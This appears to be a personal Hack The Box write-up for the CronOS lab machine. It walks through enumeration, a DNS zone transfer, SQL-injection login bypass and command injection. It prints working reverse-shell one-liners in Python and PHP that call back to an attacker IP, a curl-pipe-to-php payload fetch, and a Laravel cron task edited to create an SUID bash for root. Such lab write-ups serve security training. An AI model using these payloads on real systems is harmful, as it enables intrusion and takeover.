Comment on page
HTB CronOS Writeup

nmap: 
​
​
Host is up (0.11s latency).
Not shown: 997 filtered tcp ports (no-response)
PORT   STATE SERVICE VERSION
22/tcp open  ssh     OpenSSH 7.2p2 Ubuntu 4ubuntu2.1 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey: 
|   2048 18:b9:73:82:6f:26:c7:78:8f:1b:39:88:d8:02:ce:e8 (RSA)
|   256 1a:e6:06:a6:05:0b:bb:41:92:b0:28:bf:7f:e5:96:3b (ECDSA)
|_  256 1a:0e:e7:ba:00:cc:02:01:04:cd:a3:a9:3f:5e:22:20 (ED25519)
53/tcp open  domain  ISC BIND 9.10.3-P4 (Ubuntu Linux)
| dns-nsid: 
|_  bind.version: 9.10.3-P4-Ubuntu
80/tcp open  http    Apache httpd 2.4.18 ((Ubuntu))
|_http-title: Apache2 Ubuntu Default Page: It works
|_http-server-header: Apache/2.4.18 (Ubuntu)
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel
​
​
HTTP enum: 
​
Default server page found for apache2 
try doing nslookup: 
commands: nslookup
type: server 
now that we see that it's hosting cronos.htb, let's try some zone transfer to discover any other subdomains. 
dig AXFR cronos.htb @IP 
​
Go buster didn't have luck. 
save the found sub-domains to /etc/hosts 
​
Found the admin page. 
​
​
try the sql injection 
​
save the post request as login.req and do 
sqlmap -r login.req
redirecting happening/ 
tried using '-- - in the user section and it worked! (intercept the traffic in the burpsuite and url encode it) 
now we can execute any commands! 
Adjusting the command section in the burpsuite, I was able to execute a command.
Let's try a one liner to get a reverse shell. 
tried 
python -c 'import socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect(("10.10.14.131",5555));os.dup2(s.fileno(),0); os.dup2(s.fileno(),1); os.dup2(s.fileno(),2);p=subprocess.call(["/bin/bash","-i"]);'
​

 Make sure to url encode it. got the reverse shell! 
called the shell with  python -c 'import pty; pty.spawn("/bin/sh")' 
PrevEsc
host the linpeas.sh and run it
​
Found a suspicious cronjob 
php
php /var/www/laravel/artisan schedule:run >> /dev/null 2>&1

where we can find a kernel cron job:
Create Scheduled Tasks With Laravel
"app/Console/Kernel.php"
​https://vegibit.com/scheduling-commands-and-tasks-in-laravel/​
how to set up a cronjob that contains terminal commands 
​
    protected function schedule(Schedule $schedule)
    {
        $schedule->exec('cd ~/Code/lpg && ls')
            ->everyMinute()
            ->sendOutputTo('/home/vagrant/Code/lpg/listing.txt');
    }
find / -name Kernel.php 2>/dev/null
$schedule->exec('php -r '$sock=fsockopen("10.10.14.131",7777);exec("/bin/sh -i <&3 >&3 2>&3");')->everyMinute();php -r '$sock=fsockopen("10.10.14.131",7777);exec("/bin/sh -i <&3 >&3 2>&3");'
I located the file in the html and downloaded by visiting the site. 
​https://www.hackingarticles.in/file-transfer-cheatsheet-windows-and-linux/ 

 Used this guy's method: 
Hack the Box Write-up #4: Cronos
David Hamann
let’s just make a temporary copy of bash (as root) and give it the SUID bit.
We add the following code to Kernel.php…
protected function schedule(Schedule $schedule)
{
    $cmd = 'cp $(which bash) /tmp/sbash; chmod +s /tmp/sbash';
    $schedule->exec($cmd)->everyMinute();
}
…then wait a minute for the cron and eventually execute ./sbash -p from /tmp.
Another method would be to edit the artisan file and let the system download a reverseshell from our host and execute it. 
<?php system('curl http://10.10.14.57/reverse.php | php') ?>
HTB Write-up: Brain*uck
HTB Write-up Jeeves (Windows)
Last modified 1yr ago